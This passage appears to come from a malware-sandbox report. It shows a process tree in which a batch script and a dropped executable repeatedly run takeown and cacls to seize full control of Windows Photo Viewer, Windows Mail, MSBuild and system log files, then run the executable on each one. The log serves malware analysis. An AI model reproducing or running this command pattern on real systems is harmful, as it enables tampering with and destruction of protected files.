    hbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:3952
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Program Files\Windows Photo Viewer\de-DE\PhotoViewer.dll.mui""
  2⤵
  PID:2980
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\de-DE\PhotoViewer.dll.mui" /E /G Admin:F /C
    3⤵
    PID:2852
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\de-DE\PhotoViewer.dll.mui"
    3⤵
    - Modifies file permissions
    PID:4756
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "PhotoViewer.dll.mui" -nobanner
    3⤵
    PID:5032
  - - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
      hbFC3HC7.exe -accepteula "PhotoViewer.dll.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:4472
- - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
    hbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1860
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Program Files\Windows Photo Viewer\ImagingDevices.exe""
  2⤵
  PID:1268
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\ImagingDevices.exe" /E /G Admin:F /C
    3⤵
    PID:3904
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\ImagingDevices.exe"
    3⤵
    - Modifies file permissions
    PID:4584
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "ImagingDevices.exe" -nobanner
    3⤵
    PID:4976
  - - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
      hbFC3HC7.exe -accepteula "ImagingDevices.exe" -nobanner
      4⤵
      Executes dropped EXE
      PID:3208
- - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
    hbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:2432
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Program Files\Windows Photo Viewer\es-ES\ImagingDevices.exe.mui""
  2⤵
  PID:4896
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\es-ES\ImagingDevices.exe.mui" /E /G Admin:F /C
    3⤵
    PID:3592
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\es-ES\ImagingDevices.exe.mui"
    3⤵
    - Modifies file permissions
    PID:4480
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "ImagingDevices.exe.mui" -nobanner
    3⤵
    PID:2724
  - - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
      hbFC3HC7.exe -accepteula "ImagingDevices.exe.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:2744
- - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
    hbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:4148
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Program Files\Windows Photo Viewer\ja-JP\ImagingDevices.exe.mui""
  2⤵
  PID:4744
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\ja-JP\ImagingDevices.exe.mui" /E /G Admin:F /C
    3⤵
    PID:3872
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\ja-JP\ImagingDevices.exe.mui"
    3⤵
    - Modifies file permissions
    PID:2212
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "ImagingDevices.exe.mui" -nobanner
    3⤵
    PID:4120
  - - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
      hbFC3HC7.exe -accepteula "ImagingDevices.exe.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:2476
- - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
    hbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:4708
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets""
  2⤵
  PID:2120
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets" /E /G Admin:F /C
    3⤵
    PID:1452
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets"
    3⤵
    - Modifies file permissions
    PID:4316
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "Workflow.Targets" -nobanner
    3⤵
    PID:3328
  - - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
      hbFC3HC7.exe -accepteula "Workflow.Targets" -nobanner
      4⤵
      Executes dropped EXE
      PID:4996
- - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
    hbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:428
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Program Files (x86)\Windows Photo Viewer\es-ES\ImagingDevices.exe.mui""
  2⤵
  PID:4380
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\es-ES\ImagingDevices.exe.mui" /E /G Admin:F /C
    3⤵
    PID:2840
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\es-ES\ImagingDevices.exe.mui"
    3⤵
    - Modifies file permissions
    PID:2952
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "ImagingDevices.exe.mui" -nobanner
    3⤵
    PID:284
  - - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
      hbFC3HC7.exe -accepteula "ImagingDevices.exe.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:304
- - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
    hbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:3068
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Program Files (x86)\Windows Photo Viewer\ja-JP\ImagingDevices.exe.mui""
  2⤵
  PID:1104
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\ja-JP\ImagingDevices.exe.mui" /E /G Admin:F /C
    3⤵
    PID:1544
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\ja-JP\ImagingDevices.exe.mui"
    3⤵
    - Modifies file permissions
    PID:2812
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "ImagingDevices.exe.mui" -nobanner
    3⤵
    PID:3132
  - - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
      hbFC3HC7.exe -accepteula "ImagingDevices.exe.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:332
- - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
    hbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:3772
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Program Files\Windows Photo Viewer\en-US\PhotoViewer.dll.mui""
  2⤵
  PID:4440
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\en-US\PhotoViewer.dll.mui" /E /G Admin:F /C
    3⤵
    PID:640
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\en-US\PhotoViewer.dll.mui"
    3⤵
    PID:3156
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "PhotoViewer.dll.mui" -nobanner
    3⤵
    PID:1336
  - - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
      hbFC3HC7.exe -accepteula "PhotoViewer.dll.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:4396
- - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
    hbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:4228
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Program Files\Windows Photo Viewer\it-IT\PhotoViewer.dll.mui""
  2⤵
  PID:4356
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\it-IT\PhotoViewer.dll.mui" /E /G Admin:F /C
    3⤵
    PID:2332
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\it-IT\PhotoViewer.dll.mui"
    3⤵
    - Modifies file permissions
    PID:472
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "PhotoViewer.dll.mui" -nobanner
    3⤵
    PID:4012
  - - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
      hbFC3HC7.exe -accepteula "PhotoViewer.dll.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:1800
- - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
    hbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:4736
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\ProgramData\USOShared\Logs\System\WuProvider.dd1e4819-5c57-41d8-98e0-4b7815c08312.1.etl""
  2⤵
  PID:4476
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\USOShared\Logs\System\WuProvider.dd1e4819-5c57-41d8-98e0-4b7815c08312.1.etl" /E /G Admin:F /C
    3⤵
    PID:3464
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\USOShared\Logs\System\WuProvider.dd1e4819-5c57-41d8-98e0-4b7815c08312.1.etl"
    3⤵
    - Modifies file permissions
    PID:2664
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "WuProvider.dd1e4819-5c57-41d8-98e0-4b7815c08312.1.etl" -nobanner
    3⤵
    PID:4672
  - - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
      hbFC3HC7.exe -accepteula "WuProvider.dd1e4819-5c57-41d8-98e0-4b7815c08312.1.etl" -nobanner
      4⤵
      Executes dropped EXE
      PID:4988
- - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
    hbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1848
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoAcq.dll.mui""
  2⤵
  PID:1636
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoAcq.dll.mui" /E /G Admin:F /C
    3⤵
    PID:4632
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoAcq.dll.mui"
    3⤵
    - Modifies file permissions
    PID:2328
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "PhotoAcq.dll.mui" -nobanner
    3⤵
    PID:2800
  - - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
      hbFC3HC7.exe -accepteula "PhotoAcq.dll.mui" -nobanner
      4⤵
      PID:2424
- - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
    hbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:860
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Program Files (x86)\Windows Photo Viewer\it-IT\PhotoAcq.dll.mui""
  2⤵
  PID:1316
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\it-IT\PhotoAcq.dll.mui" /E /G Admin:F /C
    3⤵
    PID:2368
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\it-IT\PhotoAcq.dll.mui"
    3⤵
    PID:1388
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "PhotoAcq.dll.mui" -nobanner
    3⤵
    PID:3764
  - - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
      hbFC3HC7.exe -accepteula "PhotoAcq.dll.mui" -nobanner
      4⤵
      PID:3532
- - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
    hbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3392
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Program Files\Windows Photo Viewer\es-ES\PhotoAcq.dll.mui""
  2⤵
  PID:4972
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\es-ES\PhotoAcq.dll.mui" /E /G Admin:F /C
    3⤵
    PID:2116
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\es-ES\PhotoAcq.dll.mui"
    3⤵
    - Modifies file permissions
    PID:4924
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "PhotoAcq.dll.mui" -nobanner
    3⤵
    PID:548
  - - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
      hbFC3HC7.exe -accepteula "PhotoAcq.dll.mui" -nobanner
      4⤵
      PID:4344
- - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
    hbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3592
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Program Files\Windows Photo Viewer\ja-JP\PhotoAcq.dll.mui""
  2⤵
  PID:3984
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\ja-JP\PhotoAcq.dll.mui" /E /G Admin:F /C
    3⤵
    PID:4148
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\ja-JP\PhotoAcq.dll.mui"
    3⤵
    - Modifies file permissions
    PID:3504
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "PhotoAcq.dll.mui" -nobanner
    3⤵
    PID:3144
  - - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
      hbFC3HC7.exe -accepteula "PhotoAcq.dll.mui" -nobanner
      4⤵
      PID:3484
- - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
    hbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3472
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Program Files (x86)\Windows Mail\wab.exe""
  2⤵
  PID:4284
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Mail\wab.exe" /E /G Admin:F /C
    3⤵
    PID:4772
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Mail\wab.exe"
    3⤵
    - Modifies file permissions
    PID:3768
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "wab.exe" -nobanner
    3⤵
    PID:4744
  - - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
      hbFC3HC7.exe -accepteula "wab.exe" -nobanner
      4⤵
      PID:2740
- - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
    hbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4764
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Program Files (x86)\Windows Photo Viewer\es-ES\PhotoViewer.dll.mui""
  2⤵
  PID:3832
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\es-ES\PhotoViewer.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1916
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\es-ES\PhotoViewer.dll.mui"
    3⤵
    PID:4328
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "PhotoViewer.dll.mui" -nobanner
    3⤵
    PID:5020
  - - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
      hbFC3HC7.exe -accepteula "PhotoViewer.dll.mui" -nobanner
      4⤵
      PID:2284
- - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
    hbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2952
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Program Files (x86)\Windows Photo Viewer\ja-JP\PhotoViewer.dll.mui""
  2⤵
  PID:308
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\ja-JP\PhotoViewer.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1120
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\ja-JP\PhotoViewer.dll.mui"
    3⤵
    PID:4724
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "PhotoViewer.dll.mui" -nobanner
    3⤵
    PID:1184
  - - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
      hbFC3HC7.exe -accepteula "PhotoViewer.dll.mui" -nobanner
      4⤵
      PID:3552
- - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
    hbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2784
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Program Files (x86)\Windows Photo Viewer\de-DE\ImagingDevices.exe.mui""
  2⤵
  PID:1164
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\de-DE\ImagingDevices.exe.mui" /E /G Admin:F /C
    3⤵
    PID:3516
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\de-DE\ImagingDevices.exe.mui"
    3⤵
    - Modifies file permissions
    PID:1036
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "ImagingDevices.exe.mui" -nobanner
    3⤵
    PID:5092
  - - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
      hbFC3HC7.exe -accepteula "ImagingDevices.exe.mui" -nobanner
      4⤵
      PID:4240
- - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
    hbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3776
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Program Files (x86)\Windows Photo Viewer\fr-FR\PhotoAcq.dll.mui""
  2⤵
  PID:4396
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\fr-FR\PhotoAcq.dll.mui" /E /G Admin:F /C
    3⤵
    PID:4440
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\fr-FR\PhotoAcq.dll.mui"
    3⤵
    - Modifies file permissions
    PID:4124
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "PhotoAcq.dll.mui" -nobanner
    3⤵
    PID:3184
  - - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
      hbFC3HC7.exe -accepteula "PhotoAcq.dll.mui" -nobanner
      4⤵
      PID:2288
- - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
    hbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4164
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Program Files (x86)\Windows Mail\wabmig.exe""
  2⤵
  PID:1800
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Mail\wabmig.exe" /E /G Admin:F /C
    3⤵
    PID:4128
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Mail\wabmig.exe"
    3⤵
    - Modifies file permissions
    PID:4736
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "wabmig.exe" -nobanner
    3⤵
    PID:3908
  - - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
      hbFC3HC7.exe -accepteula "wabmig.exe" -nobanner
      4⤵
      PID:3104
- - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
    hbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4716
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Program Files (x86)\Windows Photo Viewer\fr-FR\ImagingDevices.exe.mui""
  2⤵
  PID:3620
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\fr-FR\ImagingDevices.exe.mui" /E /G Admin:F /C
    3⤵
    PID:2020
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\fr-FR\ImagingDevices.exe.mui"
    3⤵
    PID:4400
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "ImagingDevices.exe.mui" -nobanner
    3⤵
    PID:892
  - - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
      hbFC3HC7.exe -accepteula "ImagingDevices.exe.mui" -nobanner
      4⤵
      PID:5096
- - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
    hbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1948
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.bbc9f126-37f6-430a-8851-995fa40ceb2e.1.etl""
  2⤵
  PID:2424
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.bbc9f126-37f6-430a-8851-995fa40ceb2e.1.etl" /E /G Admin:F /C
    3⤵
    PID:860
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.bbc9f126-37f6-430a-8851-995fa40ceb2e.1.etl"
    3⤵
    - Modifies file permissions
    PID:1556
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "MoUsoCoreWorker.bbc9f126-37f6-430a-8851-995fa40ceb2e.1.etl" -nobanner
    3⤵
    PID:2540
  - - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
      hbFC3HC7.exe -accepteula "MoUsoCoreWorker.bbc9f126-37f6-430a-8851-995fa40ceb2e.1.etl" -nobanner
      4⤵
      PID:1224
- - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
    hbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4844
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Program Files (x86)\Windows Photo Viewer\de-DE\PhotoViewer.dll.mui""
  2⤵
  PID:4472
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\de-DE\PhotoViewer.dll.mui" /E /G Admin:F /C
    3⤵
    PID:2116
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\de-DE\PhotoViewer.dll.mui"
    3⤵
    PID:4924
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "PhotoViewer.dll.mui" -nobanner
    3⤵
    PID:4768
  - - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
      hbFC3HC7.exe -accepteula "PhotoViewer.dll.mui" -nobanner
      4⤵
      PID:2992
- - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
    hbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4656
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe""
  2⤵
  PID:8
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe" /E /G Admin:F /C
    3⤵
    PID:4148
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"
    3⤵
    - Modifies file permissions
    PID:3504
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "ImagingDevices.exe" -nobanner
    3⤵
    PID:1216
  - - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
      hbFC3HC7.exe -accepteula "ImagingDevices.exe" -nobanner
      4⤵
      PID:3144
- - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
    hbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1264
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.c330a520-7e4a-47d1-a1bb-6cc187fdef4d.1.etl""
  2⤵
  PID:1428
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.c330a520-7e4a-47d1-a1bb-6cc187fdef4d.1.etl" /E /G Admin:F /C
    3⤵
    PID:4772
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.c330a520-7e4a-47d1-a1bb-6cc187fdef4d.1.etl"
    3⤵
    - Modifies file permissions
    PID:3768
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "MoUsoCoreWorker.c330a520-7e4a-47d1-a1bb-6cc187fdef4d.1.etl" -nobanner
    3⤵
    PID:1744
  - - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
      hbFC3HC7.exe -accepteula "MoUsoCoreWorker.c330a520-7e4a-47d1-a1bb-6cc187fdef4d.1.etl" -nobanner
      4⤵
      PID:476
- - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
    hbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2464
- C:\Windows\SysWOW64\cmd.exe
